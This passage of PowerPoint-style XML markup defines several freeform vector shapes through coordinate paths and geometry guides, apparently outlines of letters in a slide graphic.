                    <a:lnTo>
                      <a:pt x="452" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64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6" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5935663" y="1444625"/>
                <a:ext cx="68262" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 191"/>
                  <a:gd name="T1" fmla="*/ 204 h 205"/>
                  <a:gd name="T2" fmla="*/ 0 w 191"/>
                  <a:gd name="T3" fmla="*/ 152 h 205"/>
                  <a:gd name="T4" fmla="*/ 58 w 191"/>
                  <a:gd name="T5" fmla="*/ 0 h 205"/>
                  <a:gd name="T6" fmla="*/ 190 w 191"/>
                  <a:gd name="T7" fmla="*/ 52 h 205"/>
                  <a:gd name="T8" fmla="*/ 127 w 191"/>
                  <a:gd name="T9" fmla="*/ 204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1" h="205">
                    <a:moveTo>
                      <a:pt x="127" y="204"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="204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7" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6094413" y="1331913"/>
                <a:ext cx="282575" cy="317500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 426 w 783"/>
                  <a:gd name="T1" fmla="*/ 614 h 883"/>
                  <a:gd name="T2" fmla="*/ 426 w 783"/>
                  <a:gd name="T3" fmla="*/ 614 h 883"/>
                  <a:gd name="T4" fmla="*/ 662 w 783"/>
                  <a:gd name="T5" fmla="*/ 162 h 883"/>
                  <a:gd name="T6" fmla="*/ 782 w 783"/>
                  <a:gd name="T7" fmla="*/ 225 h 883"/>
                  <a:gd name="T8" fmla="*/ 441 w 783"/>
                  <a:gd name="T9" fmla="*/ 882 h 883"/>
                  <a:gd name="T10" fmla="*/ 289 w 783"/>
                  <a:gd name="T11" fmla="*/ 803 h 883"/>
                  <a:gd name="T12" fmla="*/ 368 w 783"/>
                  <a:gd name="T13" fmla="*/ 257 h 883"/>
                  <a:gd name="T14" fmla="*/ 363 w 783"/>
                  <a:gd name="T15" fmla="*/ 257 h 883"/>
                  <a:gd name="T16" fmla="*/ 127 w 783"/>
                  <a:gd name="T17" fmla="*/ 719 h 883"/>
                  <a:gd name="T18" fmla="*/ 0 w 783"/>
                  <a:gd name="T19" fmla="*/ 656 h 883"/>
                  <a:gd name="T20" fmla="*/ 347 w 783"/>
                  <a:gd name="T21" fmla="*/ 0 h 883"/>
                  <a:gd name="T22" fmla="*/ 499 w 783"/>
                  <a:gd name="T23" fmla="*/ 78 h 883"/>
                  <a:gd name="T24" fmla="*/ 426 w 783"/>
                  <a:gd name="T25" fmla="*/ 614 h 8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83" h="883">
                    <a:moveTo>
                      <a:pt x="426" y="614"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="614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8" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6296025" y="1512888"/>
                <a:ext cx="188913" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 526"/>
                  <a:gd name="T1" fmla="*/ 305 h 579"/>
                  <a:gd name="T2" fmla="*/ 142 w 526"/>
                  <a:gd name="T3" fmla="*/ 347 h 579"/>
                  <a:gd name="T4" fmla="*/ 131 w 526"/>
                  <a:gd name="T5" fmla="*/ 389 h 579"/>
                  <a:gd name="T6" fmla="*/ 137 w 526"/>
                  <a:gd name="T7" fmla="*/ 426 h 579"/>
                  <a:gd name="T8" fmla="*/ 142 w 526"/>
                  <a:gd name="T9" fmla="*/ 441 h 579"/>
                  <a:gd name="T10" fmla="*/ 158 w 526"/>
                  <a:gd name="T11" fmla="*/ 452 h 579"/>
                  <a:gd name="T12" fmla="*/ 189 w 526"/>
                  <a:gd name="T13" fmla="*/ 463 h 579"/>
                  <a:gd name="T14" fmla="*/ 215 w 526"/>
                  <a:gd name="T15" fmla="*/ 457 h 579"/>
                  <a:gd name="T16" fmla="*/ 247 w 526"/>
                  <a:gd name="T17" fmla="*/ 441 h 579"/>
                  <a:gd name="T18" fmla="*/ 389 w 526"/>
                  <a:gd name="T19" fmla="*/ 473 h 579"/>
                  <a:gd name="T20" fmla="*/ 357 w 526"/>
                  <a:gd name="T21" fmla="*/ 510 h 579"/>
                  <a:gd name="T22" fmla="*/ 299 w 526"/>
                  <a:gd name="T23" fmla="*/ 557 h 579"/>
                  <a:gd name="T24" fmla="*/ 262 w 526"/>
                  <a:gd name="T25" fmla="*/ 573 h 579"/>
                  <a:gd name="T26" fmla="*/ 195 w 526"/>
                  <a:gd name="T27" fmla="*/ 573 h 579"/>
                  <a:gd name="T28" fmla="*/ 110 w 526"/>
                  <a:gd name="T29" fmla="*/ 536 h 579"/>
                  <a:gd name="T30" fmla="*/ 78 w 526"/>
                  <a:gd name="T31" fmla="*/ 515 h 579"/>
                  <a:gd name="T32" fmla="*/ 31 w 526"/>
                  <a:gd name="T33" fmla="*/ 473 h 579"/>
                  <a:gd name="T34" fmla="*/ 21 w 526"/>
                  <a:gd name="T35" fmla="*/ 447 h 579"/>
                  <a:gd name="T36" fmla="*/ 5 w 526"/>
                  <a:gd name="T37" fmla="*/ 405 h 579"/>
                  <a:gd name="T38" fmla="*/ 0 w 526"/>
                  <a:gd name="T39" fmla="*/ 357 h 579"/>
                  <a:gd name="T40" fmla="*/ 11 w 526"/>
                  <a:gd name="T41" fmla="*/ 310 h 579"/>
                  <a:gd name="T42" fmla="*/ 31 w 526"/>
                  <a:gd name="T43" fmla="*/ 263 h 579"/>
                  <a:gd name="T44" fmla="*/ 84 w 526"/>
                  <a:gd name="T45" fmla="*/ 169 h 579"/>
                  <a:gd name="T46" fmla="*/ 147 w 526"/>
                  <a:gd name="T47" fmla="*/ 79 h 579"/>
                  <a:gd name="T48" fmla="*/ 184 w 526"/>
                  <a:gd name="T49" fmla="*/ 48 h 579"/>
                  <a:gd name="T50" fmla="*/ 221 w 526"/>
                  <a:gd name="T51" fmla="*/ 22 h 579"/>
                  <a:gd name="T52" fmla="*/ 268 w 526"/>
                  <a:gd name="T53" fmla="*/ 6 h 579"/>
                  <a:gd name="T54" fmla="*/ 315 w 526"/>
                  <a:gd name="T55" fmla="*/ 0 h 579"/>
                  <a:gd name="T56" fmla="*/ 336 w 526"/>
                  <a:gd name="T57" fmla="*/ 6 h 579"/>
                  <a:gd name="T58" fmla="*/ 394 w 526"/>
                  <a:gd name="T59" fmla="*/ 22 h 579"/>
                  <a:gd name="T60" fmla="*/ 425 w 526"/>
                  <a:gd name="T61" fmla="*/ 42 h 579"/>
                  <a:gd name="T62" fmla="*/ 489 w 526"/>
                  <a:gd name="T63" fmla="*/ 95 h 579"/>
                  <a:gd name="T64" fmla="*/ 499 w 526"/>
                  <a:gd name="T65" fmla="*/ 111 h 579"/>
                  <a:gd name="T66" fmla="*/ 525 w 526"/>
                  <a:gd name="T67" fmla="*/ 195 h 579"/>
                  <a:gd name="T68" fmla="*/ 519 w 526"/>
                  <a:gd name="T69" fmla="*/ 236 h 579"/>
                  <a:gd name="T70" fmla="*/ 504 w 526"/>
                  <a:gd name="T71" fmla="*/ 289 h 579"/>
                  <a:gd name="T72" fmla="*/ 446 w 526"/>
                  <a:gd name="T73" fmla="*/ 389 h 579"/>
                  <a:gd name="T74" fmla="*/ 189 w 526"/>
                  <a:gd name="T75" fmla="*/ 268 h 579"/>
                  <a:gd name="T76" fmla="*/ 389 w 526"/>
                  <a:gd name="T77" fmla="*/ 221 h 579"/>
                  <a:gd name="T78" fmla="*/ 394 w 526"/>
                  <a:gd name="T79" fmla="*/ 200 h 579"/>
                  <a:gd name="T80" fmla="*/ 399 w 526"/>
                  <a:gd name="T81" fmla="*/ 179 h 579"/>
                  <a:gd name="T82" fmla="*/ 394 w 526"/>
                  <a:gd name="T83" fmla="*/ 147 h 579"/>
                  <a:gd name="T84" fmla="*/ 383 w 526"/>
                  <a:gd name="T85" fmla="*/ 132 h 579"/>
                  <a:gd name="T86" fmla="*/ 368 w 526"/>
                  <a:gd name="T87" fmla="*/ 121 h 579"/>
                  <a:gd name="T88" fmla="*/ 331 w 526"/>
                  <a:gd name="T89" fmla="*/ 111 h 579"/>
                  <a:gd name="T90" fmla="*/ 315 w 526"/>
                  <a:gd name="T91" fmla="*/ 116 h 579"/>
                  <a:gd name="T92" fmla="*/ 299 w 526"/>
                  <a:gd name="T93" fmla="*/ 121 h 579"/>
                  <a:gd name="T94" fmla="*/ 273 w 526"/>
                  <a:gd name="T95" fmla="*/ 147 h 579"/>
                  <a:gd name="T96" fmla="*/ 236 w 526"/>
                  <a:gd name="T97" fmla="*/ 195 h 579"/>
                  <a:gd name="T98" fmla="*/ 357 w 526"/>
                  <a:gd name="T99" fmla="*/ 273 h 5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26" h="579">
                    <a:moveTo>
                      <a:pt x="168" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="389" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="221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9" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6442075" y="1550988"/>
                <a:ext cx="177800" cy="258762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 494 w 495"/>
                  <a:gd name="T1" fmla="*/ 83 h 719"/>
                  <a:gd name="T2" fmla="*/ 405 w 495"/>
                  <a:gd name="T3" fmla="*/ 215 h 719"/>
                  <a:gd name="T4" fmla="*/ 473 w 495"/>
                  <a:gd name="T5" fmla="*/ 262 h 719"/>
                  <a:gd name="T6" fmla="*/ 415 w 495"/>
                  <a:gd name="T7" fmla="*/ 341 h 719"/>
                  <a:gd name="T8" fmla="*/ 347 w 495"/>
                  <a:gd name="T9" fmla="*/ 294 h 719"/>
                  <a:gd name="T10" fmla="*/ 174 w 495"/>
                  <a:gd name="T11" fmla="*/ 541 h 719"/>
                  <a:gd name="T12" fmla="*/ 174 w 495"/>
                  <a:gd name="T13" fmla="*/ 541 h 719"/>
                  <a:gd name="T14" fmla="*/ 158 w 495"/>
                  <a:gd name="T15" fmla="*/ 567 h 719"/>
                  <a:gd name="T16" fmla="*/ 153 w 495"/>
                  <a:gd name="T17" fmla="*/ 582 h 719"/>
                  <a:gd name="T18" fmla="*/ 153 w 495"/>
                  <a:gd name="T19" fmla="*/ 582 h 719"/>
                  <a:gd name="T20" fmla="*/ 158 w 495"/>
                  <a:gd name="T21" fmla="*/ 603 h 719"/>
                  <a:gd name="T22" fmla="*/ 179 w 495"/>
                  <a:gd name="T23" fmla="*/ 619 h 719"/>
                  <a:gd name="T24" fmla="*/ 179 w 495"/>
                  <a:gd name="T25" fmla="*/ 619 h 719"/>
                  <a:gd name="T26" fmla="*/ 195 w 495"/>
                  <a:gd name="T27" fmla="*/ 630 h 719"/>
                  <a:gd name="T28" fmla="*/ 195 w 495"/>
                  <a:gd name="T29" fmla="*/ 630 h 719"/>
                  <a:gd name="T30" fmla="*/ 205 w 495"/>
                  <a:gd name="T31" fmla="*/ 635 h 719"/>
                  <a:gd name="T32" fmla="*/ 147 w 495"/>
                  <a:gd name="T33" fmla="*/ 718 h 719"/>
                  <a:gd name="T34" fmla="*/ 147 w 495"/>
                  <a:gd name="T35" fmla="*/ 718 h 719"/>
                  <a:gd name="T36" fmla="*/ 110 w 495"/>
                  <a:gd name="T37" fmla="*/ 692 h 719"/>
                  <a:gd name="T38" fmla="*/ 110 w 495"/>
                  <a:gd name="T39" fmla="*/ 692 h 719"/>
                  <a:gd name="T40" fmla="*/ 74 w 495"/>
                  <a:gd name="T41" fmla="*/ 666 h 719"/>
                  <a:gd name="T42" fmla="*/ 74 w 495"/>
                  <a:gd name="T43" fmla="*/ 666 h 719"/>
                  <a:gd name="T44" fmla="*/ 43 w 495"/>
                  <a:gd name="T45" fmla="*/ 645 h 719"/>
                  <a:gd name="T46" fmla="*/ 22 w 495"/>
                  <a:gd name="T47" fmla="*/ 624 h 719"/>
                  <a:gd name="T48" fmla="*/ 22 w 495"/>
                  <a:gd name="T49" fmla="*/ 624 h 719"/>
                  <a:gd name="T50" fmla="*/ 6 w 495"/>
                  <a:gd name="T51" fmla="*/ 603 h 719"/>
                  <a:gd name="T52" fmla="*/ 0 w 495"/>
                  <a:gd name="T53" fmla="*/ 582 h 719"/>
                  <a:gd name="T54" fmla="*/ 0 w 495"/>
                  <a:gd name="T55" fmla="*/ 582 h 719"/>
                  <a:gd name="T56" fmla="*/ 0 w 495"/>
                  <a:gd name="T57" fmla="*/ 556 h 719"/>
                  <a:gd name="T58" fmla="*/ 11 w 495"/>
                  <a:gd name="T59" fmla="*/ 535 h 719"/>
                  <a:gd name="T60" fmla="*/ 11 w 495"/>
                  <a:gd name="T61" fmla="*/ 535 h 719"/>
                  <a:gd name="T62" fmla="*/ 48 w 495"/>
                  <a:gd name="T63" fmla="*/ 472 h 719"/>
                  <a:gd name="T64" fmla="*/ 231 w 495"/>
                  <a:gd name="T65" fmla="*/ 210 h 719"/>
                  <a:gd name="T66" fmla="*/ 169 w 495"/>
                  <a:gd name="T67" fmla="*/ 167 h 719"/>
                  <a:gd name="T68" fmla="*/ 227 w 495"/>
                  <a:gd name="T69" fmla="*/ 89 h 719"/>
                  <a:gd name="T70" fmla="*/ 284 w 495"/>
                  <a:gd name="T71" fmla="*/ 130 h 719"/>
                  <a:gd name="T72" fmla="*/ 378 w 495"/>
                  <a:gd name="T73" fmla="*/ 0 h 719"/>
                  <a:gd name="T74" fmla="*/ 494 w 495"/>
                  <a:gd name="T75" fmla="*/ 83 h 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95" h="719">
                    <a:moveTo>
                      <a:pt x="494" y="83"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="405" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
